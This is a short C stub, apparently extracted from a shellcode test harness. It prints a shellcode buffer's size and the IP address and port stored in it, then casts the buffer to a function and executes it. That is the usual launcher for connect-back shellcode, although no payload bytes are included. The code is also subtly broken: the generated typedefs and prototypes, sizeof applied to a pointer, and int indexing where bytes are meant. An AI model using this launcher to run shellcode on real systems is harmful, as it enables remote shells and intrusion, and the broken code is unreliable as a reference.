
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int SWAP16 (unsigned short) ;
 int printf (char*,int,int,int,int,int,int ) ;
 int* sc ;
 int stub1 () ;

int main()
{
 printf("shellcode=%d bytes\n"
        "connecting to %d.%d.%d.%d:%hd\n", sizeof sc,
  sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f],
  SWAP16(*((unsigned short *)(sc+0x3a))));
 return ((int (*)(void))sc)();
}
